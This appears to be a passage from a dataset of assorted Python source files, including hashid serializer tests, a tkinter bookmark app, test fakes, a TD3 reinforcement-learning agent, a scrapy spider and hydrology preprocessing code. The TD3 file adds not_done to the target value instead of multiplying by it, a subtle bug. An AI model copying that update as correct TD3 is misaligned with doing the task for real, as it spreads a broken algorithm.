Record._meta.get_field('id').get_hashid(512)\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 512\",\n 'artist': 512,\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n self.assertFalse(s.is_valid())\n self.assertSerializerError(s, 'artist', 'invalid_hashid')\n\n # Make sure lookups of a related field are allowed with hashid string and saving a new instance works\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 512\",\n 'artist': artist.id.hashid,\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n self.assertTrue(s.is_valid())\n r512 = s.save()\n self.assertEqual(r512.id.hashid, record_id.hashid)\n self.assertEqual(r512.name, \"Test Record 512\")\n self.assertEqual(r512.artist, artist)\n\n # Make sure lookups of a related field are allowed even if the hashid looks like an integer\n # With the id 161051 on Artist.id, we get the hashid \"6966666\" which is all numerics\n artist = Artist.objects.create(id=161051, name=\"Test Artist 161051\")\n self.assertEqual(artist.id.hashid, \"6966666\")\n record_id = Record._meta.get_field('id').get_hashid(768)\n data = {\n 'id': record_id.hashid,\n 'name': \"Test Record 768\",\n 'artist': \"6966666\",\n 'reference_id': reference_id.hashid,\n }\n s = RecordSerializer(data=data)\n s.is_valid()\n self.assertTrue(s.is_valid())\n r768 = s.save()\n self.assertEqual(r768.id.hashid, record_id.hashid)\n self.assertEqual(r768.name, \"Test Record 768\")\n self.assertEqual(r768.artist, artist)\n\n def test_int_lookups_on_int_field(self):\n class RecordSerializer(serializers.ModelSerializer):\n id = HashidSerializerIntegerField(source_field='tests.Record.id')\n artist = serializers.PrimaryKeyRelatedField(\n pk_field=HashidSerializerIntegerField(source_field='tests.Artist.id'),\n queryset=Artist.objects.all(),\n required=False)\n reference_id = HashidSerializerIntegerField(source_field='tests.Record.reference_id')\n\n class Meta:\n model = Record\n fields = ('id', 'name', 'artist', 'reference_id')\n\n artist = Artist.objects.create(id=1024, name=\"Test Artist 1024\")\n\n # HashidSerializerIntegerField allows int lookups regardless of allow_int_lookup settings\n data = {\n 'id': 1024,\n 'name': \"Test Record 1024\",\n 'artist': 1024,\n 'reference_id': 2222222222,\n }\n s = RecordSerializer(data=data)\n self.assertTrue(s.is_valid())\n r512 = s.save()\n self.assertEqual(r512.id, 1024)\n self.assertEqual(r512.name, \"Test Record 1024\")\n self.assertEqual(r512.artist, artist)\n\n def test_invalid_source_field_strings(self):\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"tests\")\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"tests.Artist\")\n with self.assertRaises(ValueError):\n id = HashidSerializerIntegerField(source_field=\"Artist.id\")\n with self.assertRaises(LookupError):\n id = HashidSerializerIntegerField(source_field=\"foo.Bar.baz\")\n with self.assertRaises(LookupError):\n id = HashidSerializerIntegerField(source_field=\"tests.Bar.baz\")\n with self.assertRaises(exceptions.FieldDoesNotExist):\n id = HashidSerializerIntegerField(source_field=\"tests.Artist.baz\")\n\n def test_modelserializer_with_prefix(self):\n class TrackSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field=\"tests.Track.id\")\n\n class Meta:\n model = Track\n fields = (\"id\",)\n\n salt = Track._meta.get_field(\"id\").salt\n alphabet = Track._meta.get_field(\"id\").alphabet\n min_length = Track._meta.get_field(\"id\").min_length\n reference = hashids.Hashids(salt=salt, min_length=min_length, alphabet=alphabet)\n\n track = Track.objects.create()\n expected = 'albumtrack:' + reference.encode(1)\n self.assertEqual(track.id, expected)\n\n serializer = TrackSerializer(track)\n self.assertEqual(serializer.data[\"id\"], expected)\n","repo_name":"nshafer/django-hashid-field","sub_path":"tests/test_rest_framework.py","file_name":"test_rest_framework.py","file_ext":"py","file_size_in_byte":9295,"program_lang":"python","lang":"en","doc_type":"code","stars":357,"dataset":"github-code","pt":"50"} +{"seq_id":"72967982555","text":"import tkinter as tk\nimport webbrowser\n\n\ndef github(event):\n webbrowser.open_new_tab('https://github.com/cyberase')\n\n\ndef twitter(event):\n webbrowser.open_new_tab('https://twitter.com/cyberasee?t=gHzWF_z2INYqiiAhNXr-8w&s=09')\n\n\ndef instagram(event):\n webbrowser.open_new_tab('https://www.instagram.com/xappinez/')\n\n\nwindow = tk.Tk()\nwindow.geometry(\"350x220\")\nwindow.title(\"Social Media Bookmark App\")\n\nlabel1 = tk.Label(text=\"My Social Media\")\nlabel1.grid(column=0, row=0)\n\nbutton1 = tk.Button(window, text=\"GitHub\", bg=\"yellow\")\nbutton1.grid(column=1, row=1)\nbutton2 = tk.Button(window, text=\"Twitter\", bg=\"blue\")\nbutton2.grid(column=3, row=1)\nbutton3 = tk.Button(window, text=\"Instagram\", bg=\"pink\")\nbutton3.grid(column=5, row=1)\n\nbutton1.bind(\"\", github)\nbutton2.bind(\"\", twitter)\nbutton3.bind(\"\", instagram)\n\nwindow.mainloop()\n","repo_name":"cyberase/Social_Media_Bookmark_App","sub_path":"Social Media Bookmark App.py","file_name":"Social Media Bookmark App.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6620863326","text":"import uuid\nfrom collections import defaultdict\nfrom datetime import datetime, timezone\n\nfrom slowking import bootstrap\nfrom slowking.adapters import notifications, repository\nfrom slowking.adapters.http import EigenClient, ProjectStruct\nfrom slowking.domain import commands, events, model\nfrom slowking.service_layer import unit_of_work\n\n\nclass FakeRepository(repository.AbstractRepository):\n def __init__(self, benchmarks):\n super().__init__()\n self._benchmarks = set(benchmarks)\n\n def _add(self, benchmark):\n # add a fake id to the benchmark\n benchmark.id = len(self._benchmarks) + 1\n self._benchmarks.add(benchmark)\n\n def _get_by_id(self, id):\n return next((b for b in self._benchmarks if b.id == id), None)\n\n def _get_by_name(self, name):\n return next((b for b in self._benchmarks if b.name == name), None)\n\n def _get_by_host_and_project_id(self, host: str, project_id: int):\n # implement if needed\n pass\n\n\nclass FakeUnitOfWork(unit_of_work.AbstractUnitOfWork):\n def __init__(self):\n self.benchmarks = FakeRepository([])\n self.committed = False\n self.flushed = False\n self.rolled_back = False\n\n def _commit(self):\n self.committed = True\n\n def _rollback(self):\n self.rolled_back = True\n\n def _flush(self):\n self.flushed = True\n\n def rollback(self):\n self.rollback()\n\n\nclass FakeNotifications(notifications.AbstractNotifications):\n def __init__(self):\n self.sent = defaultdict(list)\n\n def send(self, benchmark: model.Benchmark, message: str):\n destination = [\"test@example.com\"]\n self.sent[destination].append(message)\n\n\nclass FakeClient(EigenClient):\n def __init__(self, *args, **kwargs):\n pass\n\n def create_project(self, *args, **kwargs):\n response = ProjectStruct(\n document_type_id=123,\n guid=str(uuid.uuid4()),\n name=\"test\",\n description=\"test\",\n created_at=datetime.now(tz=timezone.utc).isoformat(),\n language=\"en\",\n use_numerical_confidence_predictions=True,\n )\n return response\n\n\ndef bootstrap_test_app():\n return bootstrap.bootstrap(\n start_orm=False,\n uow=FakeUnitOfWork(),\n notifications=FakeNotifications(),\n publish=lambda *args: None,\n client=FakeClient,\n )\n\n\ndef test_create_benchmark():\n bus = bootstrap_test_app()\n bus.handle(\n commands.CreateBenchmark(\n channel=commands.CommandChannelEnum.CREATE_BENCHMARK,\n name=\"test\",\n benchmark_type=\"latency\",\n target_infra=\"k8s\",\n target_url=\"http://localhost:8080\",\n target_eigen_platform_version=\"0.0.1\",\n username=\"test\",\n password=\"secret_pw\",\n )\n )\n assert bus.uow.benchmarks.get_by_id(1) is not None\n assert bus.uow.committed # type: ignore\n\n\ndef test_create_project():\n bus = bootstrap_test_app()\n bus.handle(\n commands.CreateBenchmark(\n channel=commands.CommandChannelEnum.CREATE_BENCHMARK,\n name=\"test\",\n benchmark_type=\"latency\",\n target_infra=\"k8s\",\n target_url=\"http://localhost:8080\",\n target_eigen_platform_version=\"0.0.1\",\n username=\"test\",\n password=\"secret_pw\",\n )\n )\n benchmark = bus.uow.benchmarks.get_by_id(1)\n assert benchmark is not None\n\n bus.handle(events.BenchmarkCreated(benchmark_id=1))\n # this is the project id returned from the fake client\n assert benchmark.project.eigen_project_id == 123\n assert bus.uow.committed # type: ignore\n","repo_name":"sam-atkins/slowking","sub_path":"tests/integration/slowking/service_layer/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10616726480","text":"import copy\nimport numpy as np\nfrom utils import soft_update\n\nimport torch\n\nfrom model import Actor, Critic\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nimport torch.nn.functional as F\n\n# Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass TD3(object):\n def __init__(\n self, \n state_dim,\n action_dim,\n max_action,\n discount=0.99,\n tau=0.005,\n policy_noise=0.2,\n noise_clip=0.5,\n policy_freq=2\n ):\n\n # Set up Actor, actor target, and optimizer\n self.actor = Actor(state_dim, action_dim, max_action).to(device) #Step 1 pseudocode\n self.actor_target = copy.deepcopy(self.actor) #Step 2 Pseudocode\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(), lr=3e-4)\n\n # Set up Critic, critic target, and optimizer\n self.critic = Critic(state_dim, action_dim).to(device) #Step 1 pseudocode\n self.critic_target = copy.deepcopy(self.critic) #Step 2 Pseudocode\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(), lr=3e-4)\n\n #Set up hyper parameters\n self.max_action = max_action\n self.discount = discount\n self.tau = tau\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n\n self.total_it = 0\n\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(device)\n return self.actor(state).cpu().data.numpy().flatten()\n\n def train(self, replay_buffer, batch_size=256):\n self.total_it += 1\n\n #Sample replay buffer\n state, action, next_state, reward, not_done = replay_buffer.sample(batch_size) # Step 4.ii pseudocode\n\n with torch.no_grad():\n # Select action according to policy and add clipped noise\n # but clip the noise to keep the action close to original value\n noise = ( \n torch.randn_like(action) * self.policy_noise\n ).clamp(-self.noise_clip, self.noise_clip) # Step 4.iii pseudocode\n\n\n #paper doesn't say to do this but clamping to the max possible action\n #prevents noise from going over the max\n next_action = (\n self.actor_target(next_state) + noise\n ).clamp(-self.max_action, self.max_action) # Step 4.iii pseudocode\n\n #Compute the target Q value\n target_Q1, target_Q2 = self.critic_target(next_state, next_action) # Step 4.iv pseudocode\n target_Q = torch.min(target_Q1, target_Q2) # Step 4.iv pseudocode\n target_Q = reward + not_done + self.discount * target_Q # Step 4.iv pseudocode\n\n\n #Get current Q estimate\n current_Q1, current_Q2 = self.critic(state, action) # Step 4.v pseudocode\n\n #Compute critic loss\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q) # Step 4.v pseudocode\n\n #Optimize the critic\n self.critic_optimizer.zero_grad() # Step 4.v pseudocode\n critic_loss.backward() # Step 4.v pseudocode\n self.critic_optimizer.step() # Step 4.v pseudocode\n\n #Delayed policy updates\n if self.total_it % self.policy_freq == 0: # Step 4.vi\n\n #Compute actor losse\n actor_loss = -self.critic.Q1(state, self.actor(state)).mean() # Step 4.vi.a\n\n # Optimize the actor\n self.actor_optimizer.zero_grad() # Step 4.vi.a\n actor_loss.backward() # Step 4.vi.a\n self.actor_optimizer.step() # Step 4.vi.a\n\n\n #Update the frozen target models\n soft_update(self.critic_target, self.critic, self.tau) # Step 4.vi.b of pseudocode the first one \n soft_update(self.actor_target, self.actor, self.tau) # Step 4.vi.b of pseudocode the second one\n\n\n #Save the actor and critic and their optimizers\n def save(self, filename):\n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n torch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n #Save the actor and critic and their optimizers\n def load(self, filename, evaluate=True):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n\n if evaluate:\n self.critic.eval()\n self.critic_target.eval()\n self.actor.eval()\n self.actor_target.eval()\n\n else:\n self.critic.train()\n self.critic_target.train()\n self.actor.train()\n self.actor_target.train()\n","repo_name":"ChadMcintire/TD3","sub_path":"TD3_example/TD3.py","file_name":"TD3.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42150778715","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nSpider module for crawling alibi.com\n\"\"\"\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom activitiesin.items import ActivitiesinItem\nimport sys\n\nclass AlibiSpider(BaseSpider):\n \"\"\"\n Spider for crawling alibi.com\n \"\"\"\n name = \"alibi\"\n allowed_domains = [\"alibi.com\"]\n start_urls = [\n \"http://alibi.com/events/searchresult.html?com=searchresult&t=2\", #music\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=8\", # word\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=7\", # art\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=9\", # stage\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=18\", # stage\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=11\", # song and dance\n #\"http://alibi.com/events/searchresult.html?com=searchresult&t=4\" # community\n ]\n\n def parse(self, response):\n \"\"\"\n hxs = HtmlXPathSelector(response)\n sites = hxs.select('//ul/li')\n items = []\n for site in sites:\n item = DmozItem()\n item['title'] = site.select('a/text()').extract()\n item['link'] = site.select('a/@href').extract()\n item['desc'] = site.select('text()').extract()\n items.append(item)\n \"\"\"\n hxs = HtmlXPathSelector(response)\n searchresults = hxs.select('//section[@id=\"searchresult\"]')\n dates = searchresults.select('.//header[@class=\\\n \"eventdates\"]/text()').extract()\n events = searchresults.select('.//ul[@class=\"events\"]')\n items = []\n category = events[0].select('.//a[@itemprop=\"eventType\"]/text()')\\\n .extract()[0]\n for i in xrange(len(dates)):\n current_venue = -1\n venue = \"\"\n for event in events[i].select(\"li\"):\n location = event.select('.//div/text()').extract()\n\n try:\n item = ActivitiesinItem()\n if len(location):\n venue = location[0]\n info = event.select('a[@class=\"summary\"]/text()')\\\n .extract()[0].split(u'•')\n item['activity'] = info[0]\n item['location'] = venue\n item['date'] = dates[i]\n\n item['time'] = event.select('.//abbr[\\\n @class=\"value\"]/text()').extract()\n\n item['time'] = item['time'][0]\n\n item['link'] = \"\"\n item['category'] = category\n\n if len(info) > 1:\n item['description'] = info[1]\n else:\n item['description'] = ''\n\n items.append(item)\n except:\n pass\n\n return items\n \"\"\"\n category = \"\"\n for evts in events.select('.//div[@class=\"event_category\"]/ \\\n ul/li/a[@itemprop=\"eventType\"]/text()') \\\n .extract():\n print evts\n \"\"\"\n # Steps\n # 1. Grab a link to the category\n # 2. visit that link\n # 3. parse that link and store all items\n\n","repo_name":"jdelgad/activitiesin","sub_path":"activitiesin/spiders/alibi_spider.py","file_name":"alibi_spider.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42766638079","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = r'''\nauthor: Sacha Boudjema (@sachaboudjema)\nshort_description: Value sets to be sued as argspec choices.\nversion_added: \"2.9\"\n'''\n\n\nclass EntityStatusChoices:\n CHOICES = (\n 'Enabled',\n 'Disabled'\n )\n ENABLED = 'Enabled'\n DISABLED = 'Disabled'\n\n\nclass MatchChoices:\n CHOICES = (\n 'equals',\n 'notequals',\n 'contains',\n 'icontains',\n 'belongsto',\n )\n EQUALS = 'equals'\n NOT_EQUALS = 'notequals'\n CONTAINS = 'contains'\n ICONTAINS = 'icontains'\n BELONGS_TO = 'belongsto'\n\n\nclass EntityChoices:\n CHOICES = (\n 'Service',\n 'AuthMethod',\n 'AuthSource',\n 'LocalUser',\n 'Endpoint',\n 'StaticHostList',\n 'Role',\n 'RoleMapping',\n 'PostureInternal',\n 'PostureExternal',\n 'AuditPosture',\n 'EnforcementPolicy',\n 'EnforcementProfile',\n 'NadClient',\n 'NadGroup',\n 'ProxyTarget',\n 'Simulation',\n 'AdminUser',\n 'AdminPrivileges',\n 'ServerConfig',\n 'SnmpTrapConfig',\n 'ExtSyslog',\n 'DataFilter',\n 'SyslogExportData',\n 'ContextServer',\n 'ContextServerAction',\n 'RADIUS Dictionary',\n 'PostureDictionary',\n 'TacacsServiceDictionary',\n 'TagDictionary',\n 'TagDefinition',\n 'GuestUser',\n 'OnboardDevice',\n )\n SERVICE = 'Service'\n AUTH_METHOD = 'AuthMethod'\n AUTH_SOURCE = 'AuthSource'\n LOCAL_USER = 'LocalUser'\n ENDPOINT = 'Endpoint'\n STATIC_HOSTLIST = 'StaticHostList'\n ROLE = 'Role'\n ROLE_MAPPING = 'RoleMapping'\n POSTURE_INTERNAL = 'PostureInternal'\n POSTURE_EXTERNA = 'PostureExternal'\n AUDIT_POSTURE = 'AuditPosture'\n ENF_POLICY = 'EnforcementPolicy'\n ENF_PROFILE = 'EnforcementProfile'\n NAD_CLIENT = 'NadClient'\n NAD_GROUP = 'NadGroup'\n PROXY_TARGET = 'ProxyTarget'\n SIMULATION = 'Simulation'\n ADMIN_USER = 'AdminUser'\n ADMIN_PRIVILEGES = 'AdminPrivileges'\n SERVER_CONFIG = 'ServerConfig'\n SNMP_TRAP_CONFIG = 'SnmpTrapConfig'\n EXT_SYSLOG = 'ExtSyslog'\n DATA_FILTER = 'DataFilter'\n SYSLOG_EXPORT_DATA = 'SyslogExportData'\n CONTEXT_SERVER = 'ContextServer'\n CONTEXT_SERVER_ACTION = 'ContextServerAction'\n RADIUS_DICT = 'RADIUS Dictionary'\n POSTURE_DICT = 'PostureDictionary'\n TACACS_DICT = 'TacacsServiceDictionary'\n TAG_DICT = 'TagDictionary'\n TAG_DEF = 'TagDefinition'\n GUEST_USER = 'GuestUser'\n ONBOARD_DEVICE = 'OnboardDevice'\n","repo_name":"Automation-Architech/ansible-collection-tipsconfig","sub_path":"plugins/module_utils/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9814651868","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\n\ndef pl(args):\n for e in args:\n print(\"- \" + e)\n\n\ndef getVbs(outputAllSolvers=True, removePlanning=False):\n pResults = \"../../downloads/results.csv\"\n pNames = \"../solver_names_final.txt\"\n\n d = pd.read_csv(pResults)\n d[\"n\"] = d[\"solver\"] + \"__\" + d[\"configuration\"]\n o = d\n print(\"\\n\" + str(len(o.n.unique())) + \" original solvers\")\n\n # withdrawn\n withdrawn = d[d[\"solver\"] == \"Relaxed_LCMDCBDL_noTimePara\"].n.unique()\n d = d[~d[\"n\"].isin(withdrawn)]\n print(\"Removed withdrawn solver:\")\n pl(withdrawn)\n\n # disqualified\n dis = d[d[\"verifier-result\"].isin([\"SAT-INCORRECT\", \"UNSAT-INCORRECT\"])][\n \"n\"\n ].unique()\n d = d[~d[\"n\"].isin(dis)]\n print(\"Removed disqualified solver:\")\n pl(dis)\n\n # competed in no limits\n np = d[d[\"drat\"] == \"NOPROOF\"][\"n\"].unique()\n d = d[~d[\"n\"].isin(np)]\n print(\"Removed NoLimits solver:\")\n pl(np)\n\n # demoted to no limits\n dem = d[d[\"drat\"] == \"NOT_VERIFIED\"][\"n\"].unique()\n d = d[~d[\"n\"].isin(dem)]\n print(\"Removed demoted solver:\")\n pl(dem)\n\n solverInMain = len(d[\"n\"].unique())\n print(str(solverInMain) + \" solvers participated in main track\")\n\n d = d.set_index([\"n\", \"benchmark\"])\n s = d[d[\"result\"].isin([\"SAT\", \"UNSAT\"])]\n print(str(len(s.reset_index().benchmark.unique())) + \" benchmarks have been solved\")\n vbsRows = s.groupby(\"benchmark\").time.idxmin()\n\n if outputAllSolvers:\n d = o.set_index([\"n\", \"benchmark\"])\n\n d[\"VBS_Origin\"] = False\n d.loc[vbsRows, \"VBS_Origin\"] = True\n d = d.reset_index()\n\n # adding short names\n nameDict = pd.read_csv(pNames, sep=\" \", names=[\"n\", \"name\"])\n nameDict[\"name\"] = nameDict[\"name\"].str.replace(\"\\\\\", \"\")\n d = d.merge(nameDict, on=\"n\", how=\"left\")\n d[\"name\"] = d[\"name\"].fillna(\"UNDEF\")\n\n v = d[d[\"VBS_Origin\"]].copy()\n v[\"VBS_Origin\"] = False\n v[\"n\"] = v[\"name\"] = v[\"solver\"] = \"VBS\"\n v[\"configuration\"] = \"default\"\n d = d.append(v)\n\n if removePlanning:\n print(\"removed \" + str(len(d[d[\"benchmark\"].apply(lambda x: \"ddl_\" in x)].benchmark.unique())) + \" planning bechmarks\")\n d = d[~d[\"benchmark\"].apply(lambda x: \"ddl_\" in x)]\n print(str(len(d[d.result.isin([\"SAT\", \"UNSAT\"])].benchmark.unique())) + \" solved benchmarks are left\")\n d = d.drop(\"n\", axis=1)\n return d\n\n\nvbs = getVbs()\nvalidSolversOnly = getVbs(outputAllSolvers=False)\nwithoutPlanning = getVbs(outputAllSolvers=False, removePlanning=True)\nvbs.to_csv(\"results_vbs.csv\", index=False)\nvalidSolversOnly.to_csv(\"results_vbs_main.csv\", index=False)\nwithoutPlanning.to_csv(\"results_vbs_main_noPlan.csv\", index=False)\n","repo_name":"satcompetition/2020","sub_path":"paper/vbs/vbs.py","file_name":"vbs.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"25123683889","text":"#!/bin/env python3\n\"\"\"\n\n\n\"\"\"\n\n\n#######################################################################\n# Imports\n#######################################################################\n\nimport netCDF4 as nc\nimport pcraster as pcr\nimport numpy as np\nimport datetime\nimport os\nimport time\nimport math\nimport pyproj\nfrom scipy.interpolate import NearestNDInterpolator\nfrom scipy import interpolate\nfrom tqdm import tqdm\n\n\n#######################################################################\n# Functions\n#######################################################################\n\n\ndef init_cellcenters_esrii(metadata):\n\n ncols = int(metadata[0][1])\n nrows = int(metadata[1][1])\n x_center = float(metadata[2][1])\n y_center = float(metadata[3][1])\n cellsize = float(metadata[4][1])\n\n cell_centers = np.zeros((nrows, ncols, 2))\n\n for i in range(0, nrows):\n for j in range(0, ncols):\n cell_centers[i][j][0] = x_center + cellsize * j\n cell_centers[i][j][1] = (y_center + cellsize * (nrows - 1)) - cellsize * i\n\n return cell_centers\n\n\ndef init_cellcenter(rows, cols, cell_size, xmin, ymin):\n\n cell_centers = np.zeros((rows, cols, 2))\n\n for i in range(0, rows):\n for j in range(0, cols):\n cell_centers[i][j][0] = xmin + cell_size / 2.0 + cell_size * j\n cell_centers[i][j][1] = ymin - cell_size / 2.0 - cell_size * i\n\n return cell_centers\n\n\ndef convert_lat_to_rad(lat):\n\n x1 = float(lat[0:2])\n x2 = float(lat[3:5])\n x3 = lat[-1]\n if x3 == \"N\":\n dec = x1 + x2 / 60.0\n if x3 == \"S\":\n dec = -x1 - x2 / 60.0\n radians = math.pi / 180.0 * dec\n\n return radians\n\n\n#######################################################################\n# time things\n#######################################################################\n\nstart_time = time.time()\n\n#######################################################################\n# pcraster blueprint\n#######################################################################\n\nworking_folder = r\"/home/iwbworkstation/Desktop/working_dir/model_rerun_paper1/Model_200m_HBV/staticmaps\"\nmasterdem = \"wflow_dem.map\"\n\npcr.setglobaloption(\"unitcell\")\n\npcr.setclone(working_folder + \"/\" + masterdem)\n\nrows = pcr.clone().nrRows()\ncols = pcr.clone().nrCols()\n\ncell_size = pcr.clone().cellSize()\n\n# coordinates are in upper left corner\nxmin = pcr.clone().west()\nymin = pcr.clone().north()\nxmax = xmin + cell_size * cols\nymax = ymin - cell_size * rows\n\ncell_centers = init_cellcenter(rows, cols, cell_size, xmin, ymin)\n\nprint(\"Original cell centers initialized in \" + str(time.time() - start_time) + \" s\")\n\n#######################################################################\n# NetCDF settings\n#######################################################################\n\nrain = r\"/media/iwbworkstation/My Passport/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Forcing040506/RR/RR\"\ntemp = r\"/media/iwbworkstation/My Passport/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Forcing040506/TT/TT\"\nrad = r\"/media/iwbworkstation/Volume/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Strahlung_Muerz\"\nresultfolder = r\"/home/iwbworkstation/Desktop/working_dir/model_rerun_paper1/NSGA2/Model_200m_HBV/inmaps_040506\"\n\nINCA_epsg = \"epsg:31258\"\nmodel_epsg = \"epsg:32633\"\n\n#######################################################################\n\n# Initialize Projections\ninProj = pyproj.Proj(init=INCA_epsg)\noutProj = pyproj.Proj(init=model_epsg)\n\n# Count all the files in the given folder\npath, dirs, files = next(os.walk(rain))\ncount = len(files)\n\n# allocate rain array\nrain_input = np.zeros((count, rows, cols), dtype=\"float32\")\n\ncurrent_prog = 0\n\npbar1 = tqdm(total=count)\n\n# Rainloop\ni = 0\nfor subdir, dirs, files in os.walk(rain):\n # loops of files in folder AND SORTES them alphabetically\n for file in sorted(files):\n # read some metadata from the first file and compute cell centers\n # this is only done once since they don't change\n # create file path\n path = rain + \"/\" + file\n if i == 0:\n # read INCA file in ESRII format, header only\n metadata = np.genfromtxt(path, max_rows=6, dtype=str)\n # compute cell centers in original projection\n centers = init_cellcenters_esrii(metadata)\n centers[:, :, 0], centers[:, :, 1] = pyproj.transform(\n inProj, outProj, centers[:, :, 0], centers[:, :, 1]\n )\n # reshapes cell centers matrix for interpolator\n centers_flatt = centers.reshape(len(centers[:, 0]) * len(centers[0, :]), 2)\n # flatten cell centers from master dem for interpolator\n orig_centers = cell_centers.reshape(rows * cols, 2)\n\n # read INCA file in ESRII format, precipitation data\n values = np.genfromtxt(path, skip_header=6)\n # reshape values array for interpolator\n values_flatt = values.reshape(len(centers[:, 0]) * len(centers[0, :]))\n # create the nearest neighbor interpolation function\n myInterpolator1 = NearestNDInterpolator(centers_flatt, values_flatt)\n # interpolated precipitation values\n rain_interp = myInterpolator1(orig_centers)\n # reshape them back to be writebale to the netcdf file\n rain_inter2D = rain_interp.reshape(rows, cols)\n # convert to pcr\n rain_inter2D_pcr = pcr.numpy2pcr(pcr.Scalar, rain_inter2D, -9999)\n pcrpath = resultfolder + \"/P\" + \"{:011.3f}\".format((i) / 1000.0)\n pcr.report(rain_inter2D_pcr, pcrpath)\n # write the each timestep to global precipitation matrix\n rain_input[i, :, :] = rain_inter2D[:, :]\n # count i up\n pbar1.update(1)\n\n i += 1\n\n\nprint(\"Precipitation array generated in \" + str(time.time() - start_time) + \" s\")\n#####################################\n# Temperature\n#####################################\n\n# allocate temperature matrix\ntemp_input = np.zeros((count, rows, cols), dtype=\"float32\")\n\npbar2 = tqdm(total=count)\n\n## Temperature loop also calculate PET\ni = 0\nfor subdir, dirs, files in os.walk(temp):\n # loops of files in folder AND SORTES them alphabetically\n # metadata is used from precipitation\n for file in sorted(files):\n path = temp + \"/\" + file\n # create and flatten temperature values\n values = np.genfromtxt(path, skip_header=6)\n values_flatt = values.reshape(len(centers[:, 0]) * len(centers[0, :]))\n # create new temperature interpolator\n myInterpolator2 = NearestNDInterpolator(centers_flatt, values_flatt)\n # interpolate and reshape temperature values\n temp_interp = myInterpolator2(orig_centers)\n temp_inter2D = temp_interp.reshape(rows, cols)\n temp_inter2D_pcr = pcr.numpy2pcr(pcr.Scalar, temp_inter2D, -9999)\n pcrpath = resultfolder + \"/TEMP\" + \"{:08.3f}\".format((i) / 1000.0)\n pcr.report(temp_inter2D_pcr, pcrpath)\n # write to global temperature matrix\n temp_input[i, :, :] = temp_inter2D[:, :]\n\n # handle PET\n # datestring\n datepart = file.split(\"_\")[2]\n # FIXME: magic string\n path_rad = rad + \"/\" + \"Muerz_GL_\" + datepart + \"00_00.asc\"\n\n rad_vals = np.genfromtxt(path_rad, skip_header=6)\n\n # remove potential nan values\n # check if nan in values list\n pot_nans = np.isnan(np.sum(rad_vals))\n # if nans are encountered\n if pot_nans:\n # create mask of nan values\n mask = np.isnan(rad_vals)\n # interpolate values\n rad_vals[mask] = np.interp(\n np.flatnonzero(mask), np.flatnonzero(~mask), rad_vals[~mask]\n )\n\n rad_flatt = rad_vals.reshape(len(centers[:, 0]) * len(centers[0, :]))\n myInterpolator3 = NearestNDInterpolator(centers_flatt, rad_flatt)\n # interpolate and reshape\n rad_interp = myInterpolator3(orig_centers)\n rad_inter2D = rad_interp.reshape(rows, cols)\n\n # compute PET\n phi = 0.646 + 0.0006 * temp_inter2D\n lamb = 1000.0 * (2501 - 2.38 * temp_inter2D)\n delta = (6.107 * 7.5 * 273.3 / (273.3 + temp_inter2D) ** 2.0) * np.exp(\n 7.5 * temp_inter2D / (273.3 + temp_inter2D)\n )\n rho = 1000.0\n\n # limit pet to 0\n pet = np.maximum(\n 1000 * 0.75 * (delta / (delta + phi)) * (900 * rad_inter2D / lamb / rho),\n 0.0,\n )\n pet_pcr = pcr.numpy2pcr(pcr.Scalar, pet, -9999)\n pcrpath_pet = resultfolder + \"/PET\" + \"{:09.3f}\".format((i) / 1000.0)\n pcr.report(pet_pcr, pcrpath_pet)\n\n 